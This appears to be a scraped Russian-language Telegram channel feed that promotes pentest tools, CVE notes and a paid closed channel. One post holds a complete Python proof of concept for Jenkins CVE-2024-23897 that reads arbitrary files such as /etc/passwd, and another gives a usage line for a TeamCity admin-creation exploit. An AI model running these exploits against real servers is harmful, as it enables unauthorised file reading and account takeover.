Telegram Group Search
Hackvertor — еще один инструмент, который выведет работу с Burp Suit на новый уровень.

Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.

- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.


Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#Burp #Hackvertor
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Jenkins RCE Arbitrary File Read CVE-2024-23897

Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.

PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()

data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}\n')

def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()


Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]


Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3

Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#Jenkins #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 TorBot 🐱 — это интеллектуальный OSINT-инструмент с открытым исходным кодом, написанный на Python.

Это умный Tor-краулер с открытым исходным кодом с весьма внушительным функционалом и "мозгами".

Функционал:
🔵.onion-краулер;
🔵Сохраняет ссылки в базу данных;
🔵Получает письма от сайтов для регистрации;
🔵Сохраняет результаты в JSON файл;
🔵Собирает кастомные .onion домены;
🔵Проверяет сайты на жизнь;
🔵Сам обновляется;
🔵TorBot GUI (в процессе).

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#TorBot #Tor #Bot
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 SQLiv 🐱 - Массивный сканер SQL-инъекций

SQL-injection
- одна из популярных и высокоэффективных атак на веб-приложения

Этот инструмент используется для сканирования уязвимостей SQL-инъекции на основе Python, который также может находить уязвимые веб-сайты SQL через Google Dorks.

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#SQLiv #SQL #Scan #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 HExHTTP 🐱 — это инструмент, предназначенный для проведения тестов заголовков HTTP и анализа результатов с целью выявления уязвимостей и интересного поведения.

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#http
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Miku Miku Beam — это мощный сервер стресс-тестирования, доступный на GitHub

Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.

Купить книгу по пентесту для начинающих можно тут

👉 Подписаться 👈

#Server
👩‍💻 Nagios XI — RCE

В Nagios XI 2024R1.01 обнаружена уязвимость в компоненте monitoringwizard.php, допускающая аутентифицированную инъекцию SQL (CVE-2024-24401), которая позволяет злоумышленникам создать учетную запись администратора и удаленно выполнить код.

Купить книгу по пентесту для начинающих можно тут

👉 Подписаться 👈

#nagios #sql #exploit
🐱 Обеспечение безопасности AWS 🐱

My-arsenal-of-aws-security-tools - это тщательно подобранный список инструментов с открытым исходным кодом для обеспечения безопасности, аудита, криминалистики и реагирования на инциденты AWS.

Он служит комплексным ресурсом для специалистов по безопасности, инженеров DevOps и администраторов AWS, позволяющим повысить уровень безопасности облака и оптимизировать задачи, связанные с безопасностью, на платформе AWS.

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#AWS #GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 CVE-2024-27199 TeamCity server 🐱

CVE облегчает создание несанкционированной учетной записи администратора в обход ошибок 403 в домене.
*
usage:
python RCity.py -t http://teamcity.com:8111 --verbose

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#teamcity
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 CVE-2023-20198 RCE CISCO IOS XE 🐱 — это критическая уязвимость в веб-интерфейсе управления Cisco IOS XE, которая позволяет повысить привилегии пользователя. Проблема возникает из-за недостаточной проверки пользовательских данных при обработке определённых запросов. Злоумышленник с действительными учётными данными пользователя с низкими привилегиями может отправить специально сформированный запрос, что приведёт к получению прав администратора. Уязвимость получила оценку CVSS 9.8 (критический уровень опасности) и затрагивает множество устройств Cisco, включая маршрутизаторы и коммутаторы, использующие IOS X.

Исправление: Обновление прошивки устройств

Добавления/удаления пользователей и выполнения команд/системных команд cisco cli.

Купить книгу по пентесту для начинающих можно тут 📔

👉 Подписаться 👈

#cisco #rce #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ Готовы погрузиться в темную сторону цифрового мира? ⚠️

Добро пожаловать в закрытое сообщество, где мы разбираем сложные CTF-задания , анализируем уникальные самописные вредоносные (ВПО) программы и раскрываем секреты их создания — исключительно в образовательных целях.


Статьи опубликованы исключительно в ознакомительных целях.


🗣 Описание канала
🗣 Вступить 💳🪙
🗣 Вступить ⭐️
🗣 Поддержка

👉 Подписаться 👈
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 SSHwatch 🐱 - это мощная, но простая в использовании платформа, предназначенная для мониторинга, анализа и защиты вашего доступа SSH.

Благодаря мониторингу и обнаружению угроз в режиме реального времени он обеспечивает безопасность ваших систем, обеспечивая при этом чистую и удобную для пользователя панель управления.

Мгновенный доступ к ключевым деталям, таким как общие журналы, события высокого риска, неудачные попытки входа в систему и уникальные IP-адреса - все в одном месте.

🎃 Вступить в закрытый канал 🎃

👉
Подписаться 👈

#SSH #Scan
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 Cканирование для поиска уязвимостей безопасности в веб-приложении 🐱

WhatWeb
- это сканер, написанный на языке Ruby, который может идентифицировать и распознать все веб-технологии, доступные на целевом веб-сайте.

WhatWeb имеет более 900 плагинов, каждый из которых распознает что-то свое. Он также идентифицирует номера версий, адреса электронной почты, идентификаторы учетных записей, модули веб-фреймворка, ошибки SQL и многое другое.

🎃 Вступить в закрытый канал 🎃

👉
Подписаться 👈

#Web #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 Fuzz Faster U Fool (FFUF) 🐱

Ffuf
— это мощный инструмент командной строки, предназначенный для перебора содержимого веб-приложений.

Он позволяет автоматизировать процесс фаззинга, тем самым обнаруживая скрытые файлы и директории, а также проверяя различные параметры URL и заголовки HTTP.

🎃 Вступить в закрытый канал 🎃

👉
Подписаться 👈

#Brute #Web
Please open Telegram to view this post
VIEW IN TELEGRAM
🐱 SIPVicious — это набор инструментов для аудита систем голосовой связи на базе SIP (Session Initiation Protocol, протокол установки соединения). 🐱

SIPVicious использовался для взлома серверов VoIP с целью звонков на дорогие платные номера или для голосового фишинга.  

🎃 Вступить в закрытый канал 🎃

🗣Описание

👉 Подписаться 👈

#VoIP #sip
Please open Telegram to view this post
VIEW IN TELEGRAM
CVEScannerV2 - усовершенствованный скрипт Nmap, предназначенный для обнаружения потенциальных уязвимостей в сетевых сервисах.

Результатом является сканирование, которое не только отображает вашу сеть, но и выделяет потенциальные слабые места безопасности в режиме реального времени.


🎃 Вступить в закрытый канал 🎃

🗣Описание

👉 Подписаться 👈

#Nmap #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
2025/05/17 19:48:42
Back to Top
HTML Embed Code: